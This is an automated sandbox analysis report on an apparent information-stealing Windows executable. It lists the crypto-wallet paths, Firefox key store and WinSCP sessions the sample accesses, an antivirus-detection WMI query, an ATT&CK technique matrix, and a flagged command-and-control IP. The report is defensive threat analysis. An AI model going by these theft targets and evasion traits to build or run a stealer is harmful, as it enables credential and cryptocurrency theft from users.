Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Intel\Games VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\CLR_v2.0_32 VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\EdgeBho VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Feeds VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\GameDVR VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\InputPersonalization VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Internet Explorer VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\OneDrive VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\PlayReady VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\XboxLive VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\MicrosoftEdge VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\MicrosoftEdge\SharedCacheContainers VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Packages\1527c705-839a-4832-9118-54d4Bd6a0c89_cw5n1h2txyewy VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Packages\ActiveSync VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Packages\adobe.acrobatreaderdc.protectedmode VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Packages\AppUp.IntelGraphicsExperience_8j3eq9eme6ctt VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Packages\c5e2524a-ea46-4f67-841f-6a9465d9d515_cw5n1h2txyewy VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Packages\E2A4F912-2574-4A75-9BB0-0D023378592B_cw5n1h2txyewy VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Packages\F46D4000-FD22-4DB4-AC8E-4E1DDDE828FE_cw5n1h2txyewy VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.549981C3F5F10_8wekyb3d8bbwe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.AccountsControl_cw5n1h2txyewy VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.BingWeather_8wekyb3d8bbwe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.BioEnrollment_cw5n1h2txyewy VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.CredDialogHost_cw5n1h2txyewy VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.ECApp_8wekyb3d8bbwe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.GetHelp_8wekyb3d8bbwe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Getstarted_8wekyb3d8bbwe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.LockApp_cw5n1h2txyewy VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Messaging_8wekyb3d8bbwe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Microsoft3DViewer_8wekyb3d8bbwe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdge.Stable_8wekyb3d8bbwe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdgeDevToolsClient_8wekyb3d8bbwe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\app.exe Code function: 0_2_0041C882 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,0_2_0041C882
Source: C:\Users\user\Desktop\app.exe Code function: 0_2_0041DD1B GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,0_2_0041DD1B
Source: C:\Users\user\Desktop\app.exe Code function: 0_2_00415DDE EntryPoint,GetVersionExA,GetModuleHandleA,GetModuleHandleA,GetCommandLineA,GetStartupInfoA,GetModuleHandleA,0_2_00415DDE
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT displayName FROM AntiVirusProduct

Stealing of Sensitive Information

Source: app.exe, 00000003.00000002.3296988780.0000000005518000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: %APPDATA%\Electrum\wallets\tjYCo5b
Source: app.exe, 00000003.00000003.3098259663.0000000000956000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: :"AtomicWallet","path":"%APPDATA%\\atomic\\Local Storage\\leveldb\\"},{"name":"Exodus","path":"%APPDATA%\\exodus\\exodus.wallet\\"},{"name":"JaxxWallet","path":"%APPDATA%\\Wallets\\Jaxx\\com.liberty.jaxx\\IndexedDB\\file__0.indexeddb.leveldb\\"},{"
Source: app.exe, 00000003.00000002.3296988780.0000000005518000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: %APPDATA%\Ethereum\keystore\XdPr
Source: app.exe, 00000003.00000003.3292397056.000000000556B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Exodus
Source: app.exe, 00000003.00000002.3296988780.0000000005518000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: %APPDATA%\Coinomi\Coinomi\wallets\
Source: app.exe, 00000003.00000002.3296988780.0000000005518000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: %APPDATA%\exodus\exodus.wallet\Y
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe File opened: C:\Users\user\Local Settings\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\key4.db
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe File opened: C:\Users\user\Application Data\Mozilla\Firefox
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe File opened: C:\Users\user\Local Settings\Mozilla\Firefox\Profiles\kzpbmws1.default\key4.db
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe File opened: C:\Users\user\AppData\Roaming\exodus\exodus.wallet\
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe File opened: C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets\
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\
Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application
Execution: 331 Windows Management Instrumentation; 1 Native API; At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter
Persistence: 1 DLL Side-Loading; 1 Bootkit; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At
Privilege Escalation: 1 DLL Side-Loading; 11 Process Injection; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At
Defense Evasion: 1 Disable or Modify Tools; 1 Deobfuscate/Decode Files or Information; 2 Obfuscated Files or Information; 1 Software Packing; 1 DLL Side-Loading; 1 File Deletion; 13 Virtualization/Sandbox Evasion; 11 Process Injection; 1 Bootkit
Credential Access: 1 OS Credential Dumping; 1 Input Capture; 1 Credentials in Registry; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow
Discovery: 2 System Time Discovery; 2 File and Directory Discovery; 45 System Information Discovery; 461 Security Software Discovery; 13 Virtualization/Sandbox Evasion; 1 Process Discovery; 1 Application Window Discovery; 2 System Network Configuration Discovery; Network Sniffing
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections
Collection: 1 Archive Collected Data; 3 Data from Local System; 1 Input Capture; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged
Command and Control: 1 Ingress Tool Transfer; 21 Encrypted Channel; 3 Non-Application Layer Protocol; 14 Application Layer Protocol; Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement
Behavior Graph ID: 1436386
Sample: app.exe
Startdate: 05/05/2024
Architecture: WINDOWS
Score: 100

Signatures: Snort IDS alert for network traffic; Multi AV Scanner detection for submitted file; Machine Learning detection for sample; 2 other signatures
DNS/IP: api.ipify.org

app.exe (started)
  Signatures: Detected unpacking (creates a PE file in dynamic memory); Queries sensitive physical memory information (via WMI, Win32_PhysicalMemory, often done to detect virtual machines); Contains functionality to infect the boot sector; Queries memory information (via WMI often done to detect virtual machines)
  Dropped file: C:\Users\user\AppData\Local\Temp\...\app.exe, PE32
  conhost.exe (started)
  app.exe (started)
    Signatures: Multi AV Scanner detection for dropped file; Detected unpacking (creates a PE file in dynamic memory); Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc); 7 other signatures
    DNS/IP: 144.208.127.230, 49789, 80, SHOCK-1US, United States
    DNS/IP: api.ipify.org, 172.67.74.152, 443, 49788, CLOUDFLARENETUS, United States
    conhost.exe (started)
    cmd.exe (started)
      conhost.exe (started)
      timeout.exe (started)

Source | Detection | Scanner
app.exe | 11% | ReversingLabs
app.exe | 100% | Joe Sandbox ML
app.exe | 11% | Virustotal

Source | Detection | Scanner
C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe | 100% | Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe | 11% | ReversingLabs
C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe | 11% | Virustotal
No Antivirus matches
No Antivirus matches
Name | IP | Active | Malicious | Antivirus Detection | Reputation
api.ipify.org | 172.67.74.152 | true | false | | high

Name | Malicious | Antivirus Detection | Reputation
http://144.208.127.230/ | true | 0%, Virustotal; Avira URL Cloud: safe | unknown
https://api.ipify.org/ | false | | high
                                                        • 0%, Virustotal, Browse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        https://javadl.oracle.com/webapps/download/AutoDL?BundleId=245029_d3c52aa6bfa54d3ca74e617f18309292Kapp.exe, 00000003.00000003.3182859527.00000000055E1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          high
                                                          https://secure.eicar.org/eicar.com.txtDapp.exe, 00000003.00000003.3182859527.00000000055E1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            high
                                                            https://stubdownloader.services.mozilla.com/?attribution_code=c291cmNlPXd3dy5nb29nbGUuY29tJm1lZGl1bTapp.exe, 00000003.00000003.3182859527.00000000055E1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              high
                                                              https://account.live.com/Abuse?mkt=EN-US&uiflavor=web&client_id=1E000040382627&id=293577&lmif=40&abrapp.exe, 00000003.00000003.3182859527.00000000055F6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                high
                                                                https://lh5.googleusercontent.com/p/AF1QipPFr704HJkdqZ5xefxGs53Btx8SeAbaCnWxa6-y=w92-h92-n-k-noapp.exe, 00000003.00000003.3242282826.00000000055C6000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3242197510.00000000058C6000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3246273895.00000000058E5000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3245462405.00000000058E5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  high
                                                                  http://144.208.127.230/Uapp.exe, 00000003.00000002.3296988780.0000000005518000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  https://ocsp.quovadisoffshore.com0app.exe, 00000003.00000003.3093301962.000000000551F000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000002.3296988780.0000000005518000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  https://setup.office.com/?ms.officeurl=setupapp.exe, 00000003.00000003.3182859527.00000000055F6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    high
                                                                    http://144.208.127.230:80/app.exe, 00000003.00000003.3114168289.0000000005584000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    • 0%, Virustotal, Browse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    https://recoveringlib.blogspot.comapp.exe, 00000003.00000003.3245462405.00000000058E5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      high
                                                                      http://144.208.127.230:80/-35b871f0a661app.exe, 00000003.00000003.3105612570.0000000005584000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3107523130.0000000005586000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3101845651.0000000005586000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3111746106.0000000005586000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3103619876.0000000005584000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3109755043.0000000005584000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3116136458.0000000005586000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3114168289.0000000005584000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      unknown
                                                                      https://www.google.com/images/branding/product/ico/googleg_lodp.icoapp.exe, 00000003.00000003.3188734917.00000000058E3000.00000004.00000020.00020000.00000000.sdmp, Web Data.3.drfalse
                                                                        high
                                                                        https://aka.office.com/office/url/setupMicrosoftapp.exe, 00000003.00000003.3182859527.00000000055F6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          high
                                                                          https://setup.office.com/EnterPin?ctid=7cf86fed-a1e2-4492-bd27-ed1c1d636ca8Microsoftapp.exe, 00000003.00000003.3182859527.00000000055F6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            high
                                                                            http://144.208.127.230:80/Lapp.exe, 00000003.00000003.3130432829.0000000005584000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3132299964.0000000005586000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3132482295.000000000558B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            unknown
                                                                            https://secure.eicar.org/eicar.comapp.exe, 00000003.00000003.3182148991.0000000005603000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3178386939.00000000055E3000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3182859527.0000000005603000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              high
                                                                              https://aka.office.com/office/url/setupapp.exe, 00000003.00000003.3182859527.00000000055F6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                high
                                                                                https://setup.office.com/SignIn?ru=https%3A%2F%2Fsetup.office.com%2F%3Fms.officeurl%3DsetupSignapp.exe, 00000003.00000003.3182859527.00000000055F6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  https://www.autoitscript.com/cgi-bin/getfile.pl?autoit3/autoit-v3-setup.exeapp.exe, 00000003.00000003.3182859527.00000000055E1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    http://144.208.127.230/7app.exe, 00000003.00000002.3296988780.0000000005518000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    • 0%, Virustotal, Browse
                                                                                    • Avira URL Cloud: safe
                                                                                    unknown
                                                                                    https://www.google.com/search?q=autoitapp.exe, 00000003.00000003.3182859527.00000000055F6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=Web Data.3.drfalse
                                                                                        high
                                                                                        https://setup.office.com/?ms.officeurl=setupMicrosoftapp.exe, 00000003.00000003.3182859527.00000000055F6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          https://POSTHTTP/1.1Content-Type:app.exe, 00000003.00000002.3295913444.0000000002530000.00000040.00001000.00020000.00000000.sdmpfalse
                                                                                          • Avira URL Cloud: safe
                                                                                          low
                                                                                          http://144.208.127.230/e&app.exe, 00000003.00000002.3296988780.0000000005518000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          • Avira URL Cloud: safe
                                                                                          unknown
                                                                                          https://secure.eicar.org/eicar.com.txt/app.exe, 00000003.00000003.3182148991.0000000005603000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3178386939.00000000055E3000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3182859527.0000000005603000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            https://www.google.com/search?q=eicarapp.exe, 00000003.00000003.3182859527.00000000055F6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              https://secure.eicar.org/eicar.com/app.exe, 00000003.00000003.3182148991.0000000005603000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3178386939.00000000055E3000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3182859527.0000000005603000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                https://login.windows.net/consumers/oauth2/v2.0/authorize?client_id=77f68844-337b-4044-a0d4-153795cfapp.exe, 00000003.00000003.3182859527.00000000055F6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  https://www.office.com/setupapp.exe, 00000003.00000003.3182859527.00000000055F6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    https://setup.office.com/SignIn?ru=https%3A%2F%2Fsetup.office.com%2F%3Fms.officeurl%3Dsetup2Vapp.exe, 00000003.00000003.3182859527.00000000055F6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      https://www.google.com/favicon.icoapp.exe, 00000003.00000003.3183161453.00000000058E8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        https://alldrivers4devices.netapp.exe, 00000003.00000003.3245462405.00000000058E5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        • 1%, Virustotal, Browse
                                                                                                        • Avira URL Cloud: safe
                                                                                                        unknown
                                                                                                        https://login.microsoftonline.com/consumers/oauth2/v2.0/authorize?client_id=77f68844-337b-4044-a0d4-app.exe, 00000003.00000003.3182859527.00000000055F6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          https://office.com/setupMicrosoftapp.exe, 00000003.00000003.3182859527.00000000055F6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            high
                                                                                                            https://support.google.com/chrome/?p=plugin_flashaertapp.exe, 00000003.00000003.3177221257.00000000055AC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              high
                                                                                                              https://ac.ecosia.org/autocomplete?q=app.exe, 00000003.00000003.3183161453.00000000058E8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                high
                                                                                                                https://www.eicar.org/download-anti-malware-testfile/Downloadapp.exe, 00000003.00000003.3182148991.0000000005603000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3178386939.00000000055E3000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3182859527.0000000005603000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  high
                                                                                                                  https://setup.office.com/Home/Provision?ctid=7cf86fed-a1e2-4492-bd27-ed1c1d636ca8.app.exe, 00000003.00000003.3182859527.00000000055F6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    high
                                                                                                                    https://www.office.com/setupMicrosoftapp.exe, 00000003.00000003.3182859527.00000000055F6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      high
                                                                                                                      https://setup.office.com/Home/Provision?ctid=7cf86fed-a1e2-4492-bd27-ed1c1d636ca8Continue/app.exe, 00000003.00000003.3182859527.00000000055F6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        high
                                                                                                                        http://144.208.127.230:80/oapp.exe, 00000003.00000003.3130432829.0000000005584000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3132299964.0000000005586000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3128278501.0000000005586000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3132482295.000000000558B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        • Avira URL Cloud: safe
                                                                                                                        unknown
                                                                                                                        https://setup.office.com/SignIn?ctid=34c190b7-c610-402a-b0d1-920cecdfcf12&redirectUri=https%3A%2F%2Fapp.exe, 00000003.00000003.3182859527.00000000055F6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          high
                                                                                                                          https://www.autoitscript.com/site/autoit/downloads/AutoItapp.exe, 00000003.00000003.3182859527.00000000055F6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            high
                                                                                                                            http://144.208.127.230/~app.exe, 00000003.00000003.3112020011.0000000000956000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3123955917.000000000095B000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3121520475.000000000095B000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3116384116.000000000095B000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3126108218.000000000095B000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3118889457.000000000095B000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3114263668.0000000000956000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            • 0%, Virustotal, Browse
                                                                                                                            • Avira URL Cloud: safe
                                                                                                                            unknown
                                                                                                                            http://144.208.127.230:80/Tapp.exe, 00000003.00000003.3105612570.0000000005584000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3107523130.0000000005586000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3111746106.0000000005586000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3109755043.0000000005584000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3116136458.0000000005586000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3114168289.0000000005584000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            • 0%, Virustotal, Browse
                                                                                                                            • Avira URL Cloud: safe
                                                                                                                            unknown
                                                                                                                            http://www.quovadis.bm0app.exe, 00000003.00000003.3093301962.000000000551F000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000002.3296988780.0000000005518000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            • Avira URL Cloud: safe
                                                                                                                            unknown
                                                                                                                            http://144.208.127.230:80/-35b871f0a661oziapp.exe, 00000003.00000003.3177623712.000000000090A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            • Avira URL Cloud: safe
                                                                                                                            unknown
                                                                                                                            http://144.208.127.230:80/Rapp.exe, 00000003.00000003.3177623712.000000000090A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            • Avira URL Cloud: safe
                                                                                                                            unknown
                                                                                                                            https://www.autoitscript.com/files/autoit3/autoit-v3-setup.exeQapp.exe, 00000003.00000003.3182859527.00000000055E1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              high
                                                                                                                              https://www.eicar.org/https://eicar.org/https://www.eicar.org/download-anti-malware-testfile/https:/app.exe, 00000003.00000003.3182859527.00000000055E1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                high
                                                                                                                                https://setup.office.com/Home/Provision?ctid=7cf86fed-a1e2-4492-bd27-ed1c1d636ca8Continueapp.exe, 00000003.00000003.3182859527.00000000055F6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  high
                                                                                                                                  https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=app.exe, 00000003.00000003.3183161453.00000000058E8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                    high
                                                                                                                                    https://setup.office.com/home/ProvisionLoading?ctid=7cf86fed-a1e2-4492-bd27-ed1c1d636ca8Microsoftapp.exe, 00000003.00000003.3182859527.00000000055F6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                      high
                                                                                                                                      http://144.208.127.230Uapp.exe, 00000003.00000002.3294569055.00000000008CF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                      low
                                                                                                                                      https://secure.eicar.org/eicar.com.txtapp.exe, 00000003.00000003.3182859527.00000000055F6000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3182148991.0000000005603000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3178386939.00000000055E3000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3182859527.0000000005603000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                        high
                                                                                                                                        https://www.autoitscript.com/site/autoit/downloads/7app.exe, 00000003.00000003.3182859527.00000000055F6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                          high
IP               Domain         Country        ASN     ASN Name         Malicious
144.208.127.230  unknown        United States  395092  SHOCK-1US        true
172.67.74.152    api.ipify.org  United States  13335   CLOUDFLARENETUS  false
Joe Sandbox version:40.0.0 Tourmaline
Analysis ID:1436386
Start date and time:2024-05-05 00:21:26 +02:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 9m 57s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:default.jbs
